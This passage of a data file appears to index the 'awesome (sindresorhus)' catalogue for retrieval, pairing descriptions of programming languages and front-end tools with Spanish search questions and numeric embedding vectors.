0.06665, -0.03901, -0.08839, 0.07892, 0.11689, 0.06435, 0.00611, 0.0367, 0.08516, -0.06186, -0.06079, 0.00775, 0.01086, -0.03501, -0.02845, -0.11837, -0.1054, -0.00186, -0.03193, -0.00475, -0.00607, -0.02565, -0.02546, -0.00632, -0.00573, -0.04883, 0.01216, 0.03484, -0.03331, -0.06082, -0.02849, -0.06623, -0.03134, -0.05379, 0.03488, -0.04975, -0.10557, 0.00681, 0.0288, -0.02739, 0.04886, 0.10534, -0.00617, 0.0105, -0.02437, 0.12016, 0.08441, -0.03198, 0.01098, -0.01292, -0.03494, 0.01206, -0.00617, 0.00819, 0.00761, 0.01708, 0.01863, -0.02777, 0.0713, -0.00324, -0.01394, -0.08541, 0.0381, 0.05378, 0.05373, 0.01461, -0.05869, 0.00912, -0.01191, -0.06651, 0.04135, 0.03638, -0.00173, -0.03209, -0.04974, -0.07759, -0.02766, 0.04473, -0.05838, -0.07521, -0.02472, -0.05238, -0.06924, 0.00532, 0.0365, -0.06453, -0.03849, 0.04274, 0.0575, -0.04476, 0.03217, -0.01678]} +{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: CMake β€” Build, test, and package software. ActionScript 3 β€” Object-oriented language targeting Adobe AIR. Idris β€” General purpose pure functional programming language with dependent types influenced by Haskell and ML. Ada/SPARK β€” Modern programming language designed for large, long-lived apps where reliability and efficiency are essential. Q# β€” Domain-specific programming language used for expressing quantum algorithms. Imba β€” Programming language inspired by Ruby and Python and compiles to performant JavaScript. Vala β€” Programming language designed to take full advantage of the GLib and GNOME ecosystems, while preserving the speed of C code. Coq β€” Formal language and environment for programming and specification which facilitates interactive development of machine-checked proofs. V β€” Simple, fast, safe, compiled language for developing maintainable software. Move β€” Domain-specific programming language for writing safe smart contracts.", "indexar": "cual es una buena opcion para aprender programacion funcional con tipos dependientes?", "v": [0.05121, 0.11933, -0.10371, -0.09793, 0.08244, -0.10457, 0.06685, -0.08074, -0.1308, -0.08882, -0.02953, -0.08296, -0.00045, 0.01583, -0.04606, 0.03705, 0.10985, -0.20164, -0.01344, 0.0175, -0.03222, -0.04828, -0.055, 0.04534, 0.00636, 0.05524, 0.06294, -0.04578, -0.02517, 0.08068, 0.13316, 0.02265, 0.15587, -0.12788, -0.07943, 0.1083, -0.0793, 0.01673, 0.0373, 0.02773, -0.00341, 0.03353, -0.06846, 0.13108, 0.03304, 0.1355, -0.05005, 0.06393, -0.10861, -0.0114, 0.01858, 0.08272, 0.04126, -0.06855, -0.01469, -0.11234, 0.03592, -0.12283, -0.0547, 0.02027, 0.01322, 0.09451, -0.04895, -0.0785, 0.0851, -0.05565, 0.10115, 0.06175, -0.02934, -0.02616, -0.06418, -0.02382, -0.01887, 0.04234, -0.00634, 0.07875, 0.08969, -0.04961, 0.14817, -0.05102, 0.063, -0.02898, -0.02594, 0.09635, -0.03723, -0.01189, -0.01759, 0.00988, 0.0532, -0.07779, 0.04222, 0.13167, -0.03155, 0.02757, -0.05942, -0.0544, 0.05534, 0.03307, -0.04563, 0.07385, 0.06721, -0.0536, -0.08603, 0.14205, -0.07608, 0.08381, 0.10282, -0.02614, -0.04531, 0.08181, 0.00673, -0.05846, -0.07979, -0.02731, -0.06141, 0.00841, -0.06341, 0.03939, 0.00216, -0.02652, -0.01531, 0.05038, -0.06296, 0.01923, 0.11642, 0.03798, 0.03069, 0.11154, -0.00875, 0.06809, 0.03816, -0.00035, -0.00285, -0.04076, -0.09839, -0.054, 0.12275, -0.01195, -0.06913, -0.07691, 0.03679, 0.00384, 0.04393, -0.04513, -0.03655, -0.04871, 0.12076, -0.06016, -0.00241, -0.025, -0.08482, 0.01669, 0.10794, -0.03407, -0.04213, -0.09638, -0.01207, -0.17126, -0.01216, 0.11759, -0.04025, 0.01574, 0.00705, -0.09049, 0.07471, -0.05834, -0.02845, 0.06607, 0.02319, 0.08556, -0.02016, 0.0522, 0.04826, -0.03881, -0.04457, -0.07488, -0.09239, -0.05428, 0.05177, -0.03162, -0.0447, 0.00402, -0.05204, 0.01227, 0.03076, -0.05462, -0.10059, 0.00177, -0.02418, 0.00784, -0.03382, 0.01414, -0.09781, -0.03727, 0.01565, -0.03371, 0.0313, -0.01784, 0.03776, -0.05982, -0.03813, -0.03589, 0.02937, -0.04005, 0.05955, 0.06736, 0.00836, 0.01936, 0.06259, 0.04307, 0.04594, -0.03417, 0.08727, -0.01449, 0.02112, 0.00738, -0.04444, 0.02888, 0.01521, 0.05261, 0.04312, -0.04974, 0.02193, 0.02672, -0.00154, -0.01083, 0.02306, 0.08174, -0.00542, 0.04309, -0.05237, -0.0175, 0.03438, -0.00154, 0.02634, -0.0123, 0.0346, 0.00839, -0.03457, -0.08014, 0.01628, 0.0766, 0.00582, -0.02482, -0.0278, -0.04682, -0.05521, 0.00412, -0.02676, -0.03436, -0.05739, 0.05273, 0.06531, -0.03758, 0.06261, 0.00391]} +{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: CMake β€” Build, test, and package software. ActionScript 3 β€” Object-oriented language targeting Adobe AIR. Idris β€” General purpose pure functional programming language with dependent types influenced by Haskell and ML. Ada/SPARK β€” Modern programming language designed for large, long-lived apps where reliability and efficiency are essential. Q# β€” Domain-specific programming language used for expressing quantum algorithms. Imba β€” Programming language inspired by Ruby and Python and compiles to performant JavaScript. Vala β€” Programming language designed to take full advantage of the GLib and GNOME ecosystems, while preserving the speed of C code. Coq β€” Formal language and environment for programming and specification which facilitates interactive development of machine-checked proofs. V β€” Simple, fast, safe, compiled language for developing maintainable software. Move β€” Domain-specific programming language for writing safe smart contracts.", "indexar": "que lenguaje me sirve para escribir contratos inteligentes seguros?", "v": [-0.01117, -0.03328, -0.12548, -0.21787, -0.01768, -0.184, -0.1498, -0.01959, -0.06968, -0.07422, -0.00619, -0.03543, 0.06192, -0.03251, 0.04677, 0.04513, 0.14674, -0.02637, 0.01592, -0.0455, 0.15072, -0.07359, -0.0679, -0.0726, -0.01865, -0.10625, 0.0049, 0.00343, 0.02619, 0.12657, -0.13571, 0.06442, 0.07766, -0.05034, -0.07881, 0.15472, -0.06013, 0.14455, 0.08264, 0.08649, 0.07326, 0.04807, 0.01306, -0.01367, 0.0499, 0.02645, -0.00899, -0.09925, 0.0724, -0.0362, -0.01705, -0.0435, -0.01578, -0.04471, -0.07866, 0.1418, 0.08009, 0.06812, -0.06151, -0.13984, -0.11053, 0.03192, -0.02798, 0.07153, 0.12697, -0.07891, 0.07105, 0.04647, 0.00453, -0.06146, 0.00299, -0.05863, -0.0529, 0.01338, 0.02449, 0.03719, -0.08056, -0.04807, 0.11241, 0.11653, -0.00465, -0.00606, -0.07602, 0.0232, 0.08471, -0.00479, -0.03106, -0.07292, -0.06616, 0.02195, 0.0504, -0.09347, -0.05117, -0.10831, -0.09695, 0.01405, 0.05852, -0.13347, 0.00432, 0.07817, 0.04109, -0.05919, -0.00922, 0.03637, -0.10107, 0.06515, 0.03993, 0.05263, 0.06471, -0.05858, -0.00435, 0.06591, -0.00103, -0.0691, 0.01138, 0.05514, 0.12272, -0.00304, 0.0824, 0.03314, 0.04141, 0.0356, -0.04257, 0.06237, 0.07797, -0.03821, 0.0674, 0.07399, -0.00371, 0.05031, 0.00524, -0.03593, 0.00424, -0.08223, 0.01293, 0.10014, 0.06763, 0.00744, -0.02198, 0.04495, -0.04702, 0.03551, -0.11195, 0.00093, -0.02567, 0.04946, 0.00416, -0.003, 0.00686, 0.04076, -0.05192, 0.02739, -0.03441, 0.11606, 0.00631, -0.08585, 0.04176, -0.02522, -0.08497, 0.02217, 0.02082, -0.02073, 0.01587, 0.06855, 0.09199, 0.00498, -0.0775, -0.01309, 0.11632, 0.0688, 0.05498, -0.03347, 0.12315, 0.01195, -0.03981, 0.02434, 0.01693, 0.11668, -0.05503, -0.1017, -0.0355, -0.032, -0.10435, 0.00671, 0.06391, 0.01179, 0.03942, -0.02493, -0.02025, -0.05079, -0.06215, 0.02415, -0.00649, -0.03343, -0.01435, -0.04915, -0.08554, -0.07831, 0.04471, -0.09479, 0.03161, 0.01256, 0.06079, 0.03481, 0.01351, 0.02573, 0.00062, -0.01757, -0.02583, 0.05449, 0.00455, 0.00705, 0.0419, 0.03977, 0.02842, 0.02905, -0.05531, 0.05679, 0.02358, 0.03589, 0.03989, -0.08582, -0.00073, -0.03323, -0.00181, -0.03346, -0.02049, 0.00688, -0.02149, 0.00236, -0.02067, -0.01236, -0.02555, 0.05288, -0.04074, 0.03928, -0.07577, 0.03228, -0.00361, -0.0108, -0.00493, -0.00156, -0.04908, -0.0784, -0.02362, -0.01542, -0.03503, -0.0162, -0.02839, 0.02157, -0.03013, -0.04259, 0.00326, -0.04363, 0.03951, 0.01351]} +{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: Esolangs β€” Programming languages designed for experimentation or as jokes rather than actual use. VBA β€” An event-driven version of Visual Basic 6.0 built into most Microsoft Office apps for automation and scripting. F# β€” A .NET-based language with focus on functional programming.", "indexar": "quΓ© lenguajes de programaciΓ³n son para hacer experimentos o como bromas?", "v": [0.13587, 0.00317, -0.04712, -0.13776, -0.16838, 0.00282, 0.03156, 0.00894, -0.0587, -0.10981, -0.01736, 0.11858, 0.06338, 0.01725, 0.09598, 0.0105, 0.16389, 0.03084, -0.07823, -0.06447, -0.04283, -0.02072, -0.15513, 0.02251, -0.00453, -0.11926, -0.09408, -0.03939, -0.00609, 0.09765, -0.0808, 0.10477, 0.20576, -0.05374, -0.08391, 0.07734, -0.00272, -0.0043, 0.08797, 0.16227, -0.01637, -0.03744, -0.02036, 0.02185, -0.0657, -0.06158, 0.04616, 0.01141, -0.01824, -0.08193, -0.02287, 0.03836, -0.02975, -0.00888, 0.00816, -0.02146, 0.08589, -0.16643, -0.04684, -0.03717, 0.01268, -0.04529, 0.05253, -0.00552, 0.01011, -0.06215, 0.06308, -0.02973, 0.03593, 0.05436, 0.02828, 0.01932, -0.11608, 0.0031, -0.00703, 0.0887, -0.13633, -0.02329, 0.08381, 0.08655, -0.05758, -0.02781, 0.01365, 0.05017, -0.05215, -0.00853, 0.09373, -0.03416, -0.05482, -0.02463, 0.01132, 0.0633, -0.09498, -0.05358, 0.04149, -0.02682, 0.10656, -0.03731, 0.04837, 0.09733, 0.03611, -0.06095, -0.16918, 0.08236, -0.06286, 0.17296, 0.11228, -0.06565, 0.04483, -0.00374, 0.02903, -0.05942, -0.00473, -0.11168, -0.02888, -0.01094, 0.04768, -0.04846, 0.01131, -0.02307, -0.04927, 0.10321, -0.00101, 0.01532, 0.0023, 0.06277, 0.10947, 0.06283, 0.03312, 0.1317, -0.04263, -0.03071, 0.01044, 0.03723, 0.01872, 0.04659, 0.1255, -0.06476, -0.01332, -0.02245, 0.04455, 0.10826, 0.00375, 0.04215, 0.10693, 0.0547, 0.00595, -0.00554, -0.06792, 0.04301, 0.01589, -0.00784, 0.03649, 0.13593, -0.02965, -0.05283, 0.04447, -0.04065, -0.0255, 0.05063, -0.00446, -0.01577, -0.02802, 0.00844, 0.06969, 0.01282, -0.11785, -0.05959, 0.09577, 0.00187, 0.04331, 0.03017, 0.02796, -0.02619, 0.07281, 0.04664, -0.01174, 0.0452, -0.0777, -0.15015, -0.0621, 0.01363, -0.06833, -0.05803, 0.0404, -0.00817, 0.0369, -0.01407, 0.00241, -0.03826, 0.0233, 0.04412, -0.02015, 0.0022, -0.00638, -0.0708, 0.02788, -0.02003, -0.00315, -0.02564, 0.018, -0.01361, 0.00729, -0.00427, -0.00343, 0.04348, -0.01796, -0.01308, -0.05679, 0.07265, 0.05437, -0.017, 0.03109, -0.05004, -0.04039, -0.00379, -0.03317, 0.04339, -0.00293, -0.01623, 0.02801, 0.02263, 0.02993, 0.00679, -0.06781, 0.01961, 0.07191, 0.04291, 0.05258, 0.04465, -0.01959, 0.03231, -0.00831, -0.01019, 0.05814, 0.05396, 0.00239, 0.01904, 0.01336, -0.08391, -0.0225, 0.11378, -0.09684, -0.09868, -0.06701, -0.02972, -0.06982, 0.04219, -0.023, -0.01503, 0.04033, -0.00161, 0.00793, -0.08123, 0.0111, -0.01293]} +{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: Esolangs β€” Programming languages designed for experimentation or as jokes rather than actual use. VBA β€” An event-driven version of Visual Basic 6.0 built into most Microsoft Office apps for automation and scripting. F# β€” A .NET-based language with focus on functional programming.", "indexar": "cuΓ‘l es la versiΓ³n de Visual Basic que viene integrada en los programas de Microsoft Office?", "v": [-0.00097, 0.03848, -0.03022, -0.06604, 0.00946, -0.15119, 0.00983, -0.11768, -0.04249, -0.13642, 0.10172, -0.17974, 0.02618, -0.01549, 0.05654, 0.06587, 0.12454, -0.21859, -0.0822, 0.01923, 0.04951, 0.00243, -0.02233, 0.04368, -0.02101, 0.17418, -0.05235, -0.04008, -0.01085, -0.08319, 0.04449, -0.00029, -0.05958, -0.04066, -0.00751, -0.09847, -0.12833, 0.01611, -0.02357, -0.02158, -0.01516, 0.07138, -0.01176, 0.14018, 0.10021, -0.0588, 0.09801, 0.12285, 0.02486, -0.02788, -0.15994, 0.04605, -0.02992, 0.09194, 0.00623, -0.15237, -0.02257, -0.05589, 0.05422, 0.03305, -0.06346, 0.15489, 0.00832, -0.01002, -0.0229, 0.00907, 0.0462, -0.03788, 0.01891, 0.03992, -0.05345, -0.01141, -0.00042, -0.14947, -0.02482, 0.01451, -0.07119, -0.03883, 0.03478, 0.08213, 0.07043, -0.00434, -0.06474, 0.02722, -0.05181, -0.16054, 0.00972, 0.03388, 0.02229, -0.09862, 0.03994, -0.08833, -0.09797, -0.00717, 0.04963, -0.06848, 0.03895, -0.09532, -0.00114, 0.13177, 0.00121, -0.0557, -0.14556, 0.05654, -0.08008, 0.05431, 0.06527, -0.00809, -0.10908, 0.03731, -0.00183, 0.0188, -0.03421, 0.01178, -0.0064, -0.03497, 0.00274, 0.00999, -0.02933, 0.0013, -0.05782, 0.0249, -0.07342, -0.00553, 0.02366, -0.09782, -0.00333, 0.14221, -0.04961, 0.06253, -0.06314, -0.02369, -0.05919, -0.02403, -0.07994, 0.04495, 0.07592, -0.07381, 0.04191, -0.09149, 0.08795, 0.07561, 0.11155, 0.04239, 0.08457, 0.06589, 0.04644, 0.0513, -0.08005, 0.00697, 0.00591, 0.03116, 0.0111, 0.04798, -0.05805, 0.04177, -0.02596, -0.0046, 0.01941, 0.04115, -0.01227, -0.00806, -0.06746, 0.00329, 0.00931, -0.03572, -0.05711, 0.02003, 0.00412, 0.07617, 0.01066, -0.02189, -0.00477, -0.03272, -0.06467, -0.02226, -0.04651, -0.01643, 0.00304, -0.02073, -0.11514, 0.0532, -0.01158, -0.01218, -0.0265, -0.04396, -0.02112, -0.01235, -0.00662, 0.00428, -0.05674, 0.08498, 0.02635, -0.06849, -0.01636, -0.02099, -0.09206, -0.07176, 0.03799, -0.00095, -0.10945, 0.00642, -0.08307, -0.02299, 0.07447, 0.08238, -0.01341, 0.09642, -0.03799, 0.08381, -0.00782, -0.01397, 0.00219, 0.01306, 0.03271, -0.075, 0.09116, -0.00962, 0.05502, 0.01009, -0.02246, -0.02344, 0.00775, -0.05517, -0.00826, -0.08313, 0.02458, 0.01953, -0.0092, -0.00759, 0.01262, 0.00455, -0.02457, -0.07494, 0.04646, 0.02204, 0.01453, -0.00763, -0.00661, -0.11423, -0.02199, 0.09455, -0.03282, -0.05176, -0.09118, -0.03419, -0.05302, -0.00369, 0.00457, -0.03107, -0.04349, 0.0484, 0.06095, -0.04441, -0.01162, -0.02616]} +{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: Esolangs β€” Programming languages designed for experimentation or as jokes rather than actual use. VBA β€” An event-driven version of Visual Basic 6.0 built into most Microsoft Office apps for automation and scripting. F# β€” A .NET-based language with focus on functional programming.", "indexar": "hay algΓΊn lenguaje orientado a la programaciΓ³n funcional basado en .NET?", "v": [0.05082, 0.08229, -0.1317, -0.14518, -0.09993, -0.03178, 0.0016, -0.03237, -0.14113, -0.00526, -0.06109, 0.00491, -0.02421, 0.02056, 0.02079, 0.09184, 0.10569, -0.07889, -0.08151, -0.04614, -0.10462, 0.0265, -0.01018, 0.02096, 0.0552, -0.01254, 0.05608, -0.05621, -0.00239, 0.06385, -0.0033, 0.12382, 0.11288, -0.04241, -0.01734, 0.06516, -0.05251, 0.08687, 0.00825, 0.0416, -0.06875, 0.09391, -0.07328, 0.12232, 0.03515, 0.07204, 0.01189, -0.05493, 0.01466, -0.09407, -0.0004, -0.01478, -0.06229, -0.00255, 0.01261, -0.08514, 0.12871, -0.04705, 0.04116, -0.15013, -0.02882, 0.02111, 0.04463, -0.05263, 0.03606, -0.01755, 0.12845, -0.00066, 0.00306, -0.00214, -0.03373, 0.08682, -0.14493, 0.06607, 0.04614, 0.06527, 0.00215, -0.04193, 0.14626, 0.06673, -0.04511, -0.06057, -0.07492, 0.05551, -0.12654, -0.08021, 0.11397, -0.07147, -0.05934, -0.04487, 0.04168, 0.03595, -0.16215, -0.08813, -0.03619, -0.01391, 0.03818, 0.0018, 0.07142, 0.11032, 0.0247, -0.03993, -0.08561, 0.08498, 0.02613, 0.1102, 0.16085, -0.07528, 0.05649, 0.06063, 0.059, -0.08349, 0.03996, -0.10269, -0.05028, -0.01707, 0.08636, 0.00599, 0.0864, 0.00305, -0.02214, 0.0345, -0.00499, 0.03065, 0.03586, -0.00334, 0.0582, 0.12053, 0.02951, 0.05282, -0.02409, -0.02369, 0.02051, -0.00344, -0.11878, 0.07242, 0.14275, -0.00508, 0.02841, 0.00594, 0.04342, 0.03589, 0.0091, 0.05122, 0.08525, 0.03387, 0.08334, -0.08997, -0.10183, 0.05931, -0.01492, 0.00782, 0.11073, 0.06623, -0.08378, -0.06543, 0.0043, -0.03678, -0.12876, 0.07396, 0.01657, 0.00623, -0.04879, -0.03252, 0.02532, -0.04186, -0.09257, 0.03537, 0.14308, 0.03794, -0.02584, 0.01968, 0.00043, 0.00926, -0.02537, 0.00273, -0.05317, -0.00388, 0.03289, -0.10077, -0.04059, -0.0065, -0.08989, -0.04906, -0.00119, -0.00942, -0.03164, -0.02956, -0.04277, -0.05393, -0.01798, 0.06078, -0.07006, -0.05949, 0.00501, -0.06807, -0.09879, -0.02046, 0.0405, -0.04756, -0.03631, 0.01307, 0.05432, -0.02491, 0.01638, 0.10642, 0.00461, -0.01669, -0.04341, 0.12718, -0.00328, -0.10791, -0.00657, 0.01607, -0.03165, 0.0171, 0.02711, 0.00534, 0.00131, -0.0047, -0.03161, -0.01616, 0.04865, -0.00643, 0.01077, -0.01012, 0.02744, 0.0305, 0.05986, 0.04046, -0.01856, -0.01491, -0.01426, -0.0362, -0.0075, 0.01, -0.00081, -0.00056, -0.05024, -0.08339, -0.03666, 0.08611, -0.09312, -0.05689, -0.04332, -0.07968, -0.06652, 0.03226, 0.0197, -0.04206, -0.00728, 0.04441, 0.01516, -0.06439, 0.03503, -0.02435]} +{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: ES6 Tools. Web Performance Optimization. Web Tools. CSS β€” Style sheet language that specifies how HTML elements are displayed on screen. Critical-Path Tools. Scalability. Must-Watch Talks. Protips. Frameworks. React β€” JavaScript library for building user interfaces. Relay β€” Framework for building data-driven React apps. React Hooks β€” Lets you use state and other React features without writing a class. Web Components. Polymer β€” JavaScript library to develop Web Components. Angular β€” App framework. Backbone β€” App framework. HTML5 β€” Markup language used for websites & web apps. SVG β€” XML-based vector image format. Canvas. KnockoutJS β€” JavaScript library. Dojo Toolkit β€” JavaScript toolkit. Inspiration. Ember β€” App framework. Android UI. iOS UI. Meteor. BEM. Flexbox. Web Typography. Web Accessibility. Material Design. D3 β€” Library for producing dynamic, interactive data visualizations. Emails. jQuery β€” Easy to use JavaScript library for DOM manipulation. Tips. Web Audio. Offline-First. Static Website Services.", "indexar": "quΓ© herramientas de JavaScript son las mΓ‘s ΓΊtiles para el desarrollo front-end?", "v": [-0.04011, 0.05494, -0.11813, -0.17778, -0.00266, 0.01044, -0.12033, -0.001, 0.13136, -0.06126, -0.19143, -0.09457, -0.14805, -0.10719, -0.01375, -0.05603, 0.08052, -0.1534, -0.03521, 0.01109, -0.10982, -0.02772, -0.15834, -0.1424, -0.14137, 0.00046, 0.04464, 0.03457, -0.22474, 0.18429, 0.08286, 0.06741, 0.02396, -0.02664, -0.03483, -0.04891, 0.12034, 0.0439, -0.03443, 0.07313, 0.00406, -0.06791, -0.00336, -0.01847, -0.03046, -0.00392, 0.07087, 0.05784, -0.04287, 0.02427, -0.0165, -0.05119, -0.06458, 0.04887, 0.07338, -0.06079, 0.05438, -0.13156, -0.07133, -0.05186, -0.07763, -0.04354, -0.10363, -0.00865, 0.02955, -0.14575, -0.08122, -0.03346, -0.04224, 0.03863, -0.12496, 0.00274, -0.06651, 0.00035, -0.00484, -0.02042, -0.04565, 0.04515, -0.04873, 0.06637, -0.0624, 0.02309, -0.08972, 0.05176, -0.00498, 0.03414, 0.09095, -0.00529, -0.00221, -0.08111, 0.01792, 0.08192, -0.0727, -0.09576, -0.00079, -0.0503, 0.05535, -0.0073, 0.07093, -0.05237, 0.01207, -0.11439, 0.02697, -0.05864, 0.07649, 0.0697, 0.0368, 0.00501, -0.07178, 0.04835, -0.03762, 0.10347, 0.0436, 0.03273, 0.0261, -0.01168, -0.01199, -0.07802, -0.01793, -0.13718, 0.06277, 0.0439, -0.02372, -0.04971, -0.03163, 0.00536, -0.0681, 0.07197, 0.08096, -0.03596, -0.03229, -0.08551, -0.03609, 0.01903, 0.05956, 0.10035, 0.15086, -0.04929, 0.00434, 0.00236, -0.00489, -0.05994, -0.04084, -0.04903, 0.01695, -0.06309, 0.03555, 0.04851, -0.05065, 0.00754, 0.00211, -0.05448, 0.12662, 0.03163, -0.08694, -0.07371, -0.07418, 0.02856, -0.01279, 0.03433, -0.04649, -0.0031, 0.00222, 0.02856, 0.04787, -0.03116, 0.04943, 0.06333, -0.02339, -0.01525, 0.07058, 0.00536, 0.07601, -0.039, 0.00293, -0.06019, -0.07994, -0.01789, -0.02645, -0.04953, 0.06237, 0.03898, -0.06309, 0.01569, -0.02631, -0.02651, 7e-05, -0.08654, 0.00971, 0.03069, -0.10337, 0.01079, 0.03505, -0.06332, 0.03977, 0.0643, -0.02042, -0.02457, -0.01351, -0.02393, 0.01178, 0.01141, 0.02767, -0.01943, -0.02136, -0.03135, -0.04534, -0.03198, -0.05774, 0.03284, 0.0003, -0.00475, -0.00518, 0.0321, -0.02077, -0.01322, -0.04697, 0.08475, 0.05376, 0.0012, 0.03319, 0.01022, 0.02614, -0.04191, 0.07806, 0.01248, -0.01549, 0.02548, 0.08449, 0.00912, 0.00087, -0.0647, -0.04076, -0.0057, -0.05099, -0.01388, 0.00497, 0.00216, -0.02096, -7e-05, -0.019, 0.03685, -0.02835, -0.01447, -0.11447, -0.00791, -0.05459, -0.05337, -0.04615, -0.07143, -0.03045, -0.03022, -0.02131, -0.05702, 0.02954, -0.00406]} +{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: ES6 Tools. Web Performance Optimization. Web Tools. CSS β€” Style sheet language that specifies how HTML elements are displayed on screen. Critical-Path Tools. Scalability. Must-Watch Talks. Protips. Frameworks. React β€” JavaScript library for building user interfaces. Relay β€” Framework for building data-driven React apps. React Hooks β€” Lets you use state and other React features without writing a class. Web Components. Polymer β€” JavaScript library to develop Web Components. Angular β€” App framework. Backbone β€” App framework. HTML5 β€” Markup language used for websites & web apps. SVG β€” XML-based vector image format. Canvas. KnockoutJS β€” JavaScript library. Dojo Toolkit β€” JavaScript toolkit. Inspiration. Ember β€” App framework. Android UI. iOS UI. Meteor. BEM. Flexbox. Web Typography. Web Accessibility. Material Design. D3 β€” Library for producing dynamic, interactive data visualizations. Emails. jQuery β€” Easy to use JavaScript library for DOM manipulation. Tips. Web Audio. Offline-First. Static Website Services.", "indexar": "cuΓ‘les son los frameworks recomendados para construir aplicaciones web modernas?", "v": [0.26408, 0.13317, 0.06106, -0.10073, 0.12973, -0.01049, -0.00237, -0.03606, -0.0935, -0.01469, -0.09601, -0.04913, -0.01521, -0.05309, 0.05914, 0.06893, 0.04203, -0.15885, -0.02866, 0.03002, -0.03351, -0.0111, -0.19925, -0.03318, -0.09783, -0.05144, 0.07565, -0.03242, -0.06898, -0.06432, 0.03795, 0.04044, 0.04819, 0.03084, -0.13082, -0.01386, -0.01816, 0.01244, -0.1672, -0.00093, -0.05191, 0.01115, -0.09995, -0.01119, 0.0182, -0.01316, -0.00022, -0.11485, -0.11829, -0.0332, -0.07034, 0.0594, 0.00222, 0.10511, 0.00595, -0.14573, 0.11547, -0.13333, 0.07455, -0.01809, -0.12458, 0.07545, -0.01398, -0.04536, 0.03412, -0.05733, -0.05232, 0.08361, -0.09138, -0.00666, 0.00303, -0.03536, -0.00043, 0.06356, 0.07028, 0.14994, 0.02684, -0.01212, -0.00989, 0.03588, 0.08815, -0.05183, -0.05793, -0.01693, -0.04775, -0.00149, -0.01814, -0.0046, -0.01727, -0.04918, 0.04839, -0.0194, -0.02504, 0.02323, -0.06494, -0.09795, 0.06652, 0.05419, 0.12755, 0.05494, -0.07201, -0.07869, -0.01823, -0.00669, -0.06656, 0.02323, 0.05441, -0.05132, -0.03123, -0.1117, -0.06942, -0.05902, -0.00664, 0.01252, 0.04052, 0.03284, 0.00685, -0.0454, 0.02761, -0.0758, -0.03236, -0.04528, -0.11029, -0.0216, -0.01178, 0.02021, 0.07224, 0.12066, -0.00225, 0.0237, -0.00996, -0.08305, -0.11066, -0.04518, -0.08717, 0.03307, 0.0938, -0.01386, -0.03759, -0.10789, 0.06914, -0.02358, -0.03201, 0.03409, 0.02062, 0.00408, 0.01423, -0.01746, -0.0068, -0.04394, 0.01069, 0.05072, -0.0241, 0.06287, -0.09279, -0.00581, -0.03964, -0.06254, -0.04676, 0.10743, 0.01772, 0.0178, -0.06557, 0.00671, -0.02819, 0.00326, -0.02178, 0.12797, 0.09268, 0.07615, 0.06888, 0.1293, 0.03697, -0.11053, 0.03606, -0.05375, 0.00137, 0.00156, 0.00429, -0.04033, -0.08828, -0.02722, -0.00387, 0.05434, -0.04191, -0.07408, -0.02703, 0.00774, 0.00494, 0.08068, -0.05007, 0.03947, -0.02009, -0.02138, 0.04089, 0.00561, -0.03029, -0.05158, -0.06869, -0.0453, -0.05405, -0.08748, -0.07293, -0.08231, -0.01234, 0.09484, -0.00957, 0.03355, 0.02507, 0.05114, 0.08155, -0.036, -0.00223, -0.00421, -0.00695, -0.07306, 0.00085, 0.00602, -0.0346, 0.0182, -0.05469, -0.05595, -0.02511, -0.04975, -0.00707, 0.01133, -0.04779, -0.01831, 0.03131, 0.00699, -0.00317, -0.02559, -0.08542, -0.01156, 0.00889, 0.05681, 0.00618, -0.03383, -0.09688, -0.03611, 0.00685, 0.08508, 0.01729, -0.00434, -0.00778, -0.05437, -0.02891, 0.03262, -0.0115, -0.0863, -0.06544, 0.07877, 0.04723, -0.01489, 0.01276, -0.04458]} +{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: ES6 Tools. Web Performance Optimization. Web Tools. CSS β€” Style sheet language that specifies how HTML elements are displayed on screen. Critical-Path Tools. Scalability. Must-Watch Talks. Protips. Frameworks. React β€” JavaScript library for building user interfaces. Relay β€” Framework for building data-driven React apps. React Hooks β€” Lets you use state and other React features without writing a class. Web Components. Polymer β€” JavaScript library to develop Web Components. Angular β€” App framework. Backbone β€” App framework. HTML5 β€” Markup language used for websites & web apps. SVG β€” XML-based vector image format. Canvas. KnockoutJS β€” JavaScript library. Dojo Toolkit β€” JavaScript toolkit. Inspiration. Ember β€” App framework. Android UI. iOS UI. Meteor. BEM. Flexbox. Web Typography. Web Accessibility. Material Design. D3 β€” Library for producing dynamic, interactive data visualizations. Emails. jQuery β€” Easy to use JavaScript library for DOM manipulation. Tips. Web Audio. Offline-First. Static Website Services.", "indexar": "cΓ³mo optimizo el rendimiento y la accesibilidad en mis sitios web?", "v": [0.02542, 0.10256, -0.17624, -0.11393, 0.11757, -0.08215, -0.08618, -0.04963, 